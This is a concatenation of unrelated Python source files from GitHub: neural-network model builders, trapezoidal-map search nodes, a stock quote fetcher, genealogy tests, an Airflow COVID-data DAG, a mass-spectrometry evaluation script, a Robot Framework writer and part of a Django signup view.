[[int(cij * width_scale) for cij in ci] for ci in channels]\n init_block_channels = int(init_block_channels * width_scale)\n final_block_channels = int(final_block_channels * width_scale)\n\n net = SqueezeNext(\n channels=channels,\n init_block_channels=init_block_channels,\n final_block_channels=final_block_channels,\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import download_model\n download_model(\n net=net,\n model_name=model_name,\n local_model_store_dir_path=root)\n\n return net\n\n\ndef sqnxt23_w1(**kwargs):\n \"\"\"\n 1.0-SqNxt-23 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23\", width_scale=1.0, model_name=\"sqnxt23_w1\", **kwargs)\n\n\ndef sqnxt23_w3d2(**kwargs):\n \"\"\"\n 1.5-SqNxt-23 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23\", width_scale=1.5, model_name=\"sqnxt23_w3d2\", **kwargs)\n\n\ndef sqnxt23_w2(**kwargs):\n \"\"\"\n 2.0-SqNxt-23 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23\", width_scale=2.0, model_name=\"sqnxt23_w2\", **kwargs)\n\n\ndef sqnxt23v5_w1(**kwargs):\n \"\"\"\n 1.0-SqNxt-23v5 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23v5\", width_scale=1.0, model_name=\"sqnxt23v5_w1\", **kwargs)\n\n\ndef sqnxt23v5_w3d2(**kwargs):\n \"\"\"\n 1.5-SqNxt-23v5 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23v5\", width_scale=1.5, model_name=\"sqnxt23v5_w3d2\", **kwargs)\n\n\ndef sqnxt23v5_w2(**kwargs):\n \"\"\"\n 2.0-SqNxt-23v5 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23v5\", width_scale=2.0, model_name=\"sqnxt23v5_w2\", **kwargs)\n\n\ndef _calc_width(net):\n import numpy as np\n net_params = filter(lambda p: p.requires_grad, net.parameters())\n weight_count = 0\n for param in net_params:\n weight_count += np.prod(param.size())\n return weight_count\n\n\ndef _test():\n import torch\n\n pretrained = False\n\n models = [\n sqnxt23_w1,\n sqnxt23_w3d2,\n sqnxt23_w2,\n sqnxt23v5_w1,\n sqnxt23v5_w3d2,\n sqnxt23v5_w2,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained)\n\n # net.eval()\n net.train()\n weight_count = _calc_width(net)\n print(\"m={}, {}\".format(model.__name__, weight_count))\n assert (model != sqnxt23_w1 or weight_count == 724056)\n assert (model != sqnxt23_w3d2 or weight_count == 1511824)\n assert (model != sqnxt23_w2 or weight_count == 2583752)\n assert (model != sqnxt23v5_w1 or weight_count == 921816)\n assert (model != sqnxt23v5_w3d2 or weight_count == 1953616)\n assert (model != sqnxt23v5_w2 or weight_count == 3366344)\n\n x = torch.randn(1, 3, 224, 224)\n y = net(x)\n y.sum().backward()\n assert (tuple(y.size()) == (1, 1000))\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"osmr/imgclsmob","sub_path":"pytorch/pytorchcv/models/squeezenext.py","file_name":"squeezenext.py","file_ext":"py","file_size_in_byte":12238,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"8599218125","text":"from typing import *\n\nfrom src.geometry import Point, Segment, Trapezoid\nfrom src.util import *\n\n\nclass Node:\n \"\"\"Class for the nodes of a search structure.\n\n Attributes:\n parents (Set[Node]): The parents.\n left_child (Optional[Node]): The left child.\n right_child (Optional[Node]): The right child.\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initializes Node.\n \"\"\"\n\n self.parents = set()\n self.left_child = None\n self.right_child = None\n\n def __str__(self) -> str:\n \"\"\"Returns the string representation of a Node object.\n \"\"\"\n\n res = \"\"\n res += \"\\tNode ID: \" + get_id(self) + \"\\n\"\n res += \"\\tleft_child:\\t\" + get_id(self.left_child) + \"\\n\"\n res += \"\\tright_child:\\t\" + get_id(self.right_child) + \"\\n\"\n\n return res\n\n def add_parent(self, parent: \"Node\") -> None:\n \"\"\"Adds a new parent for the current node.\n\n Args:\n parent (Node): The new parent.\n \"\"\"\n\n self.parents.add(parent)\n\n def remove_parents(self):\n \"\"\"Removes all parents from the current node.\n \"\"\"\n\n # Clear the parents.\n self.parents.clear()\n\n def set_left_child(self, child: Optional[\"Node\"]) -> None:\n \"\"\"Sets the left child of the current node.\n\n Args:\n child (Optional[Node]): The left child.\n \"\"\"\n\n self.left_child = child\n\n if child is not None:\n # Add the current node as a parent of the child.\n child.add_parent(self)\n\n def set_right_child(self, child: Optional[\"Node\"]) -> None:\n \"\"\"Sets the right child of the current node.\n\n Args:\n child (Optional[Node]): The right child.\n \"\"\"\n\n self.right_child = child\n\n if child is not None:\n # Add the current node as a parent of the child.\n child.add_parent(self)\n\n def replace_leaf(self, old: \"Node\") -> None:\n \"\"\"Replaces an existing leaf by updating the children of all its parents.\n\n Args:\n old (Node): The leaf to replace.\n \"\"\"\n\n # Iterate over all the parents of the old leaf.\n for parent in old.parents:\n if old == parent.left_child:\n # Become the new left child.\n parent.set_left_child(self)\n if old == parent.right_child: #\n # Become the new right child.\n parent.set_right_child(self)\n\n # old.remove_parents()\n\n def traverse(self, q: Point) -> Optional[\"Node\"]:\n \"\"\"Recursively traverses the search structure until a leaf, or an X-node if the point is already present.\n\n In the search structure, each leaf represents a trapezoid of the refined subdivision. The search starts from the\n root and, by evaluating the inner nodes, a path to a leaf is obtained.\n X-nodes represent endpoints of the subdivision: the query point is either to the left or to the right.\n Y-nodes represent segments of the subdivision: the query point is either above or below.\n The traversal is performed recursively, exploiting the tree-like structure of the DAG.\n\n Args:\n q (Point): The query point.\n\n Returns:\n Optional[Node]: The resulting node.\n \"\"\"\n\n # If the node is a leaf, it represents a trapezoid.\n if isinstance(self, LeafNode):\n print(\"Trapezoid ID: \" + get_id(self.trapezoid))\n return self\n else:\n # If the node is an X-node, it represents an endpoint.\n if isinstance(self, XNode):\n if q.x == self.point.x and q.y == self.point.y:\n # Stop the traversal at the current X-node.\n return self\n else:\n if q.lies_left(self.point):\n print(\"<-\\t\" + str(self.point))\n nnext = self.left_child\n else:\n print(\"->\\t\" + str(self.point))\n nnext = self.right_child\n\n # If the node is a Y-node, it represents as segment.\n elif isinstance(self, YNode):\n if q.x == self.segment.p.x and q.y == self.segment.p.y:\n # Stop the traversal at the current Y-node.\n return self\n else:\n if q.lies_above(self.segment):\n print(\"/\\\\\\t\" + str(self.segment))\n nnext = self.left_child\n else:\n print(\"\\\\/\\t\" + str(self.segment))\n nnext = self.right_child\n\n else:\n print(\"Error: Wrong node type.\")\n return\n\n # Recursively traverse the DAG.\n return nnext.traverse(q)\n\n\nclass XNode(Node):\n \"\"\"Class for X-nodes of a search structure.\n\n Attributes:\n point (Point): The referenced endpoint.\n \"\"\"\n\n def __init__(self, point: Point) -> None:\n \"\"\"Initializes XNode with the referenced endpoint.\n\n Args:\n point: The referenced endpoint.\n \"\"\"\n\n super().__init__()\n self.point = point\n\n def __str__(self) -> str:\n \"\"\"Returns the string representation of a XNode object.\n \"\"\"\n\n res = super().__str__()\n res += \"\\tPoint: \" + str(self.point) + \"\\n\"\n\n return res\n\n\nclass YNode(Node):\n \"\"\"Class for Y-nodes of a search structure.\n\n Attributes:\n segment (Segment): The referenced segment.\n \"\"\"\n\n def __init__(self, segment: Segment) -> None:\n \"\"\"Initializes YNode with the referenced segment.\n\n Args:\n segment: The referenced segment.\n \"\"\"\n\n super().__init__()\n self.segment = segment\n\n def __str__(self) -> str:\n \"\"\"Returns the string representation of a YNode object.\n \"\"\"\n\n res = super().__str__()\n res += \"\\tSegment: \" + str(self.segment) + \"\\n\"\n\n return res\n\n\nclass LeafNode(Node):\n \"\"\"Class for leaf nodes of a search structure.\n\n Attributes:\n trapezoid (Trapezoid): The referenced trapezoid.\n \"\"\"\n\n def __init__(self, trapezoid: Trapezoid) -> None:\n \"\"\"Initializes LeafNode with the referenced trapezoid.\n\n Args:\n trapezoid: The referenced trapezoid.\n \"\"\"\n\n super().__init__()\n self.trapezoid = trapezoid\n","repo_name":"giacomocallegari/spatial-databases-project","sub_path":"src/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24204386857","text":"# Create a file, e.g., yahoo_finance_api.py\n\nimport requests\n\nYAHOO_FINANCE_BASE_URL = \"https://query1.finance.yahoo.com/v7/finance/quote\"\n\ndef get_stock_data(symbol):\n url = f\"{YAHOO_FINANCE_BASE_URL}/{symbol}?fields=symbol,shortName,regularMarketPrice,regularMarketOpen,regularMarketDayHigh,regularMarketDayLow\"\n response = requests.get(url)\n if response.status_code == 200:\n data = response.json()\n return data.get(\"quoteSummary\", {}).get(\"result\", [])[0]\n else:\n return None\n","repo_name":"Gadom654/inzynierka","sub_path":"stock_app/yahoo_finance_api.py","file_name":"yahoo_finance_api.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70688622186","text":"import unittest\r\n\r\nfrom models.Individual import Individual\r\nfrom models.Family import Family\r\nfrom models.Gedcom import Gedcom\r\n\r\nSUPPORT_TAGS = {\"INDI\", \"NAME\", \"SEX\", \"BIRT\", \"DEAT\", \"FAMC\", \"FAMS\", \"FAM\", \"MARR\", \"HUSB\", \"WIFE\", \"CHIL\",\r\n \"DIV\", \"DATE\", \"HEAD\", \"TRLR\", \"NOTE\"}\r\n\r\n\r\nG1 = Gedcom('../testing_files/right.ged', SUPPORT_TAGS)\r\nG2 = Gedcom('../testing_files/wrong.ged', SUPPORT_TAGS)\r\n\r\nclass sprint3Test(unittest.TestCase):\r\n\r\n #List all deceased individuals in a GEDCOM file\r\n def test_US29_list_deceased(self):\r\n self.assertEqual(G1.listDeceased().len(),5 )\r\n self.assertNotEqual(G1.listDeceased().len(),3 )\r\n deceasedPeople = []\r\n for indi in deceasedPeople:\r\n self.assertIn(indi, G1.listDeceased())\r\n\r\n #List all living married people in a GEDCOM file\r\n def test_US30_list_living_married(self):\r\n self.assertEqual(G1.listLivingMarried().len(),5 )\r\n self.assertNotEqual(G1.listLivingMarried().len(),3 )\r\n marriedProple = []\r\n for indi in marriedProple:\r\n self.assertIn(indi, G1.listLivingmarried())\r\n\r\n #List all living people over 30 who have never been married in a GEDCOM file\r\n def test_US31_list_living_single(self):\r\n self.assertEqual(G1.listLivingSingle().len(),5 )\r\n self.assertNotEqual(G1.listLivingSingle().len(),3 )\r\n singlePeople = []\r\n for indi in singlePeople:\r\n self.assertIn(indi, G1.listLivingSingle())\r\n\r\n #List all multiple births in a GEDCOM file\r\n def test_US32_list_multiple_births(self):\r\n self.assertEqual(G1.listMultipleBirths().len(),4 )\r\n MultipleBirths = []\r\n for birt in MultipleBirths:\r\n self.assertIn(birt, G1.listMultipleBirths())\r\n\r\n #List all orphaned children (both parents dead and child < 18 years old) in a GEDCOM file\r\n def test_US33_list_orphans(self):\r\n\r\n self.assertEqual(G1.listOrphans().len(),4)\r\n OrphansPeople = []\r\n for indi in OrphansPeople:\r\n self.assertIn(indi, G1.listOrphans())\r\n\r\n #List all couples who were married when the older spouse was more than twice as old as the younger spouse\r\n def test_US34_list_large_age_differences(self):\r\n self.assertEqual(G1.listLargeAgeDifferences().len(),4 )\r\n ageDifferences = []\r\n for birt in ageDifferences:\r\n self.assertIn(birt, G1.listLargeAgeDifferences())\r\n\r\n #List all people in a GEDCOM file who were born in the last 30 days\r\n def test_US35_list_recent_births(self):\r\n\r\n self.assertEqual(G1.listRecentBirths().len(),5 )\r\n self.assertNotEqual(G1.listRecentBirths().len(),3 )\r\n bornPeople =[]\r\n for indi in bornPeople:\r\n self.assertIn(indi, G1.listRecentBirths())\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n pass\r\n","repo_name":"IncapableFury/Final_Project_SW555","sub_path":"sprint_3_testing/yt_testing.py","file_name":"yt_testing.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37331193716","text":"def fibonacci(n):\n result = []\n a = 1\n b = 1\n\n while len(result) < n:\n result.append(a)\n c = a + b\n a = b\n b = c\n return result\n\n\ndef main():\n print(fibonacci(10))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"presian/HackBulgaria","sub_path":"Programming101-3/Week_1/Warmups/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20761963771","text":"from airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nimport datetime\n\nimport requests\nimport csv\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndefault_args = {\n 'owner': 'Yuliya Pak',\n 'start_date': datetime.datetime(2020, 6, 6)\n}\n\ndag = DAG(\n 'get_covid_data_russai',\n catchup=False,\n schedule_interval='0 12 * * *',\n default_args=default_args\n)\n\n\ndef get_covid_data_russia():\n russia_covid_data = []\n list_of_covid_data = ['10', '9', '8']\n for covid_data in list_of_covid_data:\n response = requests.get(\n f\"https://yastat.net/s3/milab/2020/covid19-stat/data/data_struct_{covid_data}.json\",\n verify=False,\n )\n response.raise_for_status()\n all_russia_covid_data = response.json()['russia_stat_struct']\n dates = all_russia_covid_data['dates']\n regions_data = all_russia_covid_data['data']\n for region in regions_data:\n region_name = regions_data[region]['info']['name']\n region_cases = regions_data[region]['cases']\n region_deaths = regions_data[region]['deaths']\n region_cured = regions_data[region]['cured']\n res = list(zip(dates, region_cases, region_deaths, region_cured))\n for i in res:\n row = {\n 'date': i[0],\n 'region': region_name,\n 'infected': i[1]['v'],\n 'recovered': i[3]['v'],\n 'dead': i[2]['v']\n }\n russia_covid_data.append(row)\n\n with open('russia_covid.csv', 'w', encoding='utf-8') as f:\n fields = ['date', 'region', 'infected', 'recovered', 'dead']\n write = csv.DictWriter(f, fields, delimiter=';')\n write.writeheader()\n for ln in russia_covid_data:\n write.writerow(ln)\n\n\nget_covid_data = PythonOperator(\n task_id='get_covid_data_russia_task',\n dag=dag,\n python_callable=get_covid_data_russia,\n)\n","repo_name":"piyuliya/LearnAirflow","sub_path":"dags/covid/dag_covid.py","file_name":"dag_covid.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8121677896","text":"# -*- coding: utf-8 -*-\nimport re\nimport AminoAcidMass as config\nimport time\nimport numpy as np\n\nstart = time.time()\n\n#存放MQ和pFind3共同肽段信息的文件\nSamePeptideFile = 'D:/SoftwareEvaluationNew/2016Eric_NC_Try_Mouse/2016Eric_NC_Try_Mouse.txt'\n#比对的目标MGF文件\nTargetMGF = 'D:/SoftwareEvaluationNew/2016Eric_NC_Try_Mouse/TargetMGF.mgf'\n#b,y离子单独比对的PCC结果和b,y离子一起比对的PCC结果\nb_ion_PCC, y_ion_PCC, by_ion_PCC = {}, {}, {}\nresultbPCC, resultyPCC, resultbyPCC = [], [], []\n#按SamePeptideFile中肽段顺序生成的title列表\ntitleList = {}\n#按结果顺序生成一个title列表\nwith open(SamePeptideFile, 'r') as f:\n\tfor line in f:\n\t\tif line == '':break\n\t\tif 'peptide\tmodification' in line:continue\n\t\ttitle = re.split('\\t|\\n',line)[3]\n\t\tres_seq = re.split('\\t|\\n',line)[0]\n\t\tres_charge = re.split('\\t|\\n',line)[2]\n\t\tif len(res_seq) <= 30 and len(res_seq) >= 7:\n\t\t\tif int(res_charge) >= 1 and int(res_charge) <= 6:\n\t\t\t\tmods = re.split('\\t|\\n',line)[1]\n\t\t\t\tif mods:\n\t\t\t\t\tres_seq = [i for i in res_seq]\n\t\t\t\t\tmods = mods.split(';')[:-1]\n\t\t\t\t\tfor m in mods:\n\t\t\t\t\t\tpos = int(m.split(',')[0])\n\t\t\t\t\t\tif m.split(',')[1] == 'Oxidation[M]':\n\t\t\t\t\t\t\tres_seq[pos - 1] = 'Mmod'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tres_seq[pos - 1] = 'Cmod'\n\t\t\t\t\t# res_seq = ''.join(res_seq)\n\t\t\t\ttitleList[title] = res_seq\nprint(len(titleList))\n\n#获取mgf文件中的谱图title,以及对应的mz-intensity\nwith open(TargetMGF, 'r') as f:\n\twhile True:\n\t\tline = f.readline()\n\t\tif line == '':break\n\t\tif 'TITLE=' in line:\n\t\t\tmgf_title = re.split('=|\\n',line)[1]\n\t\t\tif mgf_title in titleList.keys():\n\t\t\t\tmgf_seq = titleList[mgf_title]\n\t\t\t\tline = f.readline()\n\t\t\t\tline = f.readline()\n\t\t\t\tmgf_mz2inten = {}\n\t\t\t\tintenList = []\n\t\t\t\twhile 'END IONS' not in line:\n\t\t\t\t\tmz = float(re.split(' |\\n', line)[0])\n\t\t\t\t\tinten = float(re.split(' |\\n', line)[1])\n\t\t\t\t\tintenList.append(inten)\n\t\t\t\t\tmgf_mz2inten[mz] = inten\n\t\t\t\t\tline = f.readline()\n\t\t\t\tmax_inten = max(intenList)\n\t\t\t\tmgf_seq_mass = 0\n\t\t\t\tfor AA in mgf_seq:\n\t\t\t\t \tmgf_seq_mass += config.mass_AA[AA]\n\t\t\t\tmgf_seq_mass = mgf_seq_mass + config.mass_H2O\n\t\t\t\tpro_mass = 0\n\t\t\t\tmgf_b_inten,mgf_y_inten = [], []\n\t\t\t\tfor index, AA in enumerate(mgf_seq[:-1]):\n\t\t\t\t\tpro_mass = pro_mass + config.mass_AA[AA]\n\t\t\t\t\tisb, isy, isb2, isy2 = False, False, False, False\n\t\t\t\t\tfor mz in mgf_mz2inten.keys():\n\t\t\t\t\t\tif abs(pro_mass + config.mass_H - mz)/mz*(10**6) <= 20 and isb == False:\n\t\t\t\t\t\t\tmgf_b_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisb = True\n\t\t\t\t\t\tif abs(pro_mass/2 + config.mass_H - mz)/mz*(10**6) <= 20 and isb2 == False:\n\t\t\t\t\t\t\tmgf_b_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisb2 = True\n\t\t\t\t\t\tif abs(mgf_seq_mass - pro_mass + config.mass_H - mz)/mz*(10**6) <= 20 and isy == False:\n\t\t\t\t\t\t\tmgf_y_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisy = True\n\t\t\t\t\t\tif abs((mgf_seq_mass - pro_mass)/2 + config.mass_H - mz)/mz*(10**6) <= 20 and isy2 == False:\n\t\t\t\t\t\t\tmgf_y_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisy2 = True\n\t\t\t\t\tif not isb:\n\t\t\t\t\t\tmgf_b_inten.append(0.0)\n\t\t\t\t\tif not isb2:\n\t\t\t\t\t\tmgf_b_inten.append(0.0)\n\t\t\t\t\tif not isy:\n\t\t\t\t\t\tmgf_y_inten.append(0.0)\n\t\t\t\t\tif not isy2:\n\t\t\t\t\t\tmgf_y_inten.append(0.0)\n\t\t\t\tmgf_by_inten = mgf_b_inten + mgf_y_inten[::-1]\n\t\t\t\tif ''.join(mgf_seq) in b_ion_PCC.keys():\n\t\t\t\t\tb_ion_PCC[''.join(mgf_seq)].append(mgf_b_inten)\n\t\t\t\t\ty_ion_PCC[''.join(mgf_seq)].append(mgf_y_inten)\n\t\t\t\t\tby_ion_PCC[''.join(mgf_seq)].append(mgf_by_inten)\n\t\t\t\telse:\n\t\t\t\t\tb_ion_PCC[''.join(mgf_seq)] = [mgf_b_inten]\n\t\t\t\t\ty_ion_PCC[''.join(mgf_seq)] = [mgf_y_inten]\n\t\t\t\t\tby_ion_PCC[''.join(mgf_seq)] = [mgf_by_inten]\n\nfor seq in b_ion_PCC:\n\tif len(b_ion_PCC[seq]) > 1:\n\t\tmedintenb = []\n\t\tpeplenb = len(b_ion_PCC[seq][0])\n\t\tpepnumb = len(b_ion_PCC[seq])\n\t\tfor i in range(peplenb):\n\t\t\ttemp = []\n\t\t\tfor j in b_ion_PCC[seq]:\n\t\t\t\ttemp.append(j[i])\n\t\t\ttemp = sorted(temp)\n\t\t\tif pepnumb % 2 == 0:\n\t\t\t\tmedintenb.append((temp[int(pepnumb/2) - 1] + temp[int(pepnumb/2)])/2)\n\t\t\telse:\n\t\t\t\tmedintenb.append(temp[pepnumb//2])\n\t\ttempPCC = []\n\t\tfor v in b_ion_PCC[seq]:\n\t\t\tpearb = config.pearSim(medintenb, v)\n\t\t\ttempPCC.append(pearb)\n\t\ttempPCC = sorted(tempPCC)\n\t\tif len(tempPCC) % 2 == 0:\n\t\t\tresultbPCC.append((tempPCC[int(len(tempPCC)/2) - 1] + tempPCC[int(len(tempPCC)/2)])/2)\n\t\telse:\n\t\t\tresultbPCC.append(tempPCC[len(tempPCC)//2])\n\n\tif len(y_ion_PCC[seq]) > 1:\n\t\tmedinteny = []\n\t\tpepleny = len(y_ion_PCC[seq][0])\n\t\tpepnumy = len(y_ion_PCC[seq])\n\t\tfor i in range(pepleny):\n\t\t\ttemp = []\n\t\t\tfor j in y_ion_PCC[seq]:\n\t\t\t\ttemp.append(j[i])\n\t\t\ttemp = sorted(temp)\n\t\t\tif pepnumy % 2 == 0:\n\t\t\t\tmedinteny.append((temp[int(pepnumy/2) - 1] + temp[int(pepnumy/2)])/2)\n\t\t\telse:\n\t\t\t\tmedinteny.append(temp[pepnumy//2])\n\t\ttempPCC = []\n\t\tfor v in y_ion_PCC[seq]:\n\t\t\tpeary = config.pearSim(medinteny, v)\n\t\t\ttempPCC.append(peary)\n\t\ttempPCC = sorted(tempPCC)\n\t\tif len(tempPCC) % 2 == 0:\n\t\t\tresultyPCC.append((tempPCC[int(len(tempPCC)/2) - 1] + tempPCC[int(len(tempPCC)/2)])/2)\n\t\telse:\n\t\t\tresultyPCC.append(tempPCC[len(tempPCC)//2])\n\n\tif len(by_ion_PCC[seq]) > 1:\n\t\t\tmedintenby = []\n\t\t\tpeplenby = len(by_ion_PCC[seq][0])\n\t\t\tpepnumby = len(by_ion_PCC[seq])\n\t\t\tfor i in range(peplenby):\n\t\t\t\ttemp = []\n\t\t\t\tfor j in by_ion_PCC[seq]:\n\t\t\t\t\ttemp.append(j[i])\n\t\t\t\ttemp = sorted(temp)\n\t\t\t\tif pepnumby % 2 == 0:\n\t\t\t\t\tmedintenby.append((temp[int(pepnumby/2) - 1] + temp[int(pepnumby/2)])/2)\n\t\t\t\telse:\n\t\t\t\t\tmedintenby.append(temp[pepnumby//2])\n\t\t\ttempPCC = []\n\t\t\tfor v in by_ion_PCC[seq]:\n\t\t\t\tpearby = config.pearSim(medintenby, v)\n\t\t\t\ttempPCC.append(pearby)\n\t\t\ttempPCC = sorted(tempPCC)\n\t\t\tif len(tempPCC) % 2 == 0:\n\t\t\t\tresultbyPCC.append((tempPCC[int(len(tempPCC)/2) - 1] + tempPCC[int(len(tempPCC)/2)])/2)\n\t\t\telse:\n\t\t\t\tresultbyPCC.append(tempPCC[len(tempPCC)//2])\n\nall_b_pears = sorted(resultbPCC)\nall_y_pears = sorted(resultyPCC)\nall_pears = sorted(resultbyPCC)\n\nlenB = len(all_b_pears)\nlenY = len(all_y_pears)\nlenall = len(all_pears)\n# print(str(lenB) + '|' + str(lenY) + '|' + str(lenall))\nif lenB % 2 == 0:\n\tmedian_b_pears = (all_b_pears[int(lenB/2) - 1] + all_b_pears[int(lenB/2)])/2\n\tmedian_y_pears = (all_y_pears[int(lenY/2) - 1] + all_y_pears[int(lenY/2)])/2\nelse:\n\tmedian_b_pears = all_b_pears[lenB//2]\n\tmedian_y_pears = all_y_pears[lenY//2]\nif lenall % 2 == 0:\n\tmedian_pears = (all_pears[int(lenall/2) - 1] + all_pears[int(lenall/2)])/2\nelse:\n\tmedian_pears = all_pears[lenall//2]\n\nprint('='*30)\nprint('PXD005590' + '-result :')\t#SamePeptideFile.split('.')[0]\nprint('by ions total number: %s'%(lenall))\nprint('Median PCCs of BY ions: %s'%median_pears)\nprint('Median PCCs of B ions: %s'%median_b_pears)\nprint('Median PCCs of Y ions: %s'%median_y_pears)\n\nendtime = time.time() - start\nprint(endtime)\n","repo_name":"PHOENIXcenter/MS2SpectraPredictionEvaluation","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":6638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"13515251722","text":"from robot.htmldata import JsonWriter\n\n\nclass JsResultWriter:\n _output_attr = 'window.output'\n _settings_attr = 'window.settings'\n _suite_key = 'suite'\n _strings_key = 'strings'\n\n def __init__(self, output,\n start_block='\\n',\n split_threshold=9500):\n writer = JsonWriter(output, separator=end_block+start_block)\n self._write = writer.write\n self._write_json = writer.write_json\n self._start_block = start_block\n self._end_block = end_block\n self._split_threshold = split_threshold\n\n def write(self, result, settings):\n self._start_output_block()\n self._write_suite(result.suite)\n self._write_strings(result.strings)\n self._write_data(result.data)\n self._write_settings_and_end_output_block(settings)\n\n def _start_output_block(self):\n self._write(self._start_block, postfix='', separator=False)\n self._write('%s = {}' % self._output_attr)\n\n def _write_suite(self, suite):\n writer = SuiteWriter(self._write_json, self._split_threshold)\n writer.write(suite, self._output_var(self._suite_key))\n\n def _write_strings(self, strings):\n variable = self._output_var(self._strings_key)\n self._write('%s = []' % variable)\n prefix = '%s = %s.concat(' % (variable, variable)\n postfix = ');\\n'\n threshold = self._split_threshold\n for index in range(0, len(strings), threshold):\n self._write_json(prefix, strings[index:index+threshold], postfix)\n\n def _write_data(self, data):\n for key in data:\n self._write_json('%s = ' % self._output_var(key), data[key])\n\n def _write_settings_and_end_output_block(self, settings):\n self._write_json('%s = ' % self._settings_attr, settings,\n separator=False)\n self._write(self._end_block, postfix='', separator=False)\n\n def _output_var(self, key):\n return '%s[\"%s\"]' % (self._output_attr, key)\n\n\nclass SuiteWriter:\n\n def __init__(self, write_json, split_threshold):\n self._write_json = write_json\n self._split_threshold = split_threshold\n\n def write(self, suite, variable):\n mapping = {}\n self._write_parts_over_threshold(suite, mapping)\n self._write_json('%s = ' % variable, suite, mapping=mapping)\n\n def _write_parts_over_threshold(self, data, mapping):\n if not isinstance(data, tuple):\n return 1\n not_written = 1 + sum(self._write_parts_over_threshold(item, mapping)\n for item in data)\n if not_written > self._split_threshold:\n self._write_part(data, mapping)\n return 1\n return not_written\n\n def _write_part(self, data, mapping):\n part_name = 'window.sPart%d' % len(mapping)\n self._write_json('%s = ' % part_name, data, mapping=mapping)\n mapping[data] = part_name\n\n\nclass SplitLogWriter:\n\n def __init__(self, output):\n self._writer = JsonWriter(output)\n\n def write(self, keywords, strings, index, notify):\n self._writer.write_json('window.keywords%d = ' % index, keywords)\n self._writer.write_json('window.strings%d = ' % index, strings)\n self._writer.write('window.fileLoading.notify(\"%s\")' % notify)\n","repo_name":"robotframework/robotframework","sub_path":"src/robot/reporting/jswriter.py","file_name":"jswriter.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"11905620203","text":"import binascii\nimport os\nimport jdatetime\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import status, generics\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom userapp.api.serializers import *\nfrom userapp.models import *\nfrom userapp.api.permissions import *\nfrom rest_framework.authtoken.models import Token\n\n\ndef _generate_pass():\n return binascii.hexlify(os.urandom(20))\n\n\nclass Signup(APIView):\n permission_classes = (AllowAny,)\n serializer_class = SignupSerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n print(request.data)\n if serializer.is_valid():\n phone = serializer.validated_data['phone']\n check_sms_or_call = False\n must_validate_sms = getattr(settings, \"AUTH_SMS_VERIFICATION\", True)\n\n try:\n user = get_user_model().objects.get(phone=phone)\n signup_sms_code = VerifyCode.objects.filter(user=user).last()\n if signup_sms_code is not None:\n now = jdatetime.datetime.now()\n\n # for i in signup_sms_code:\n c = signup_sms_code.created_at\n\n 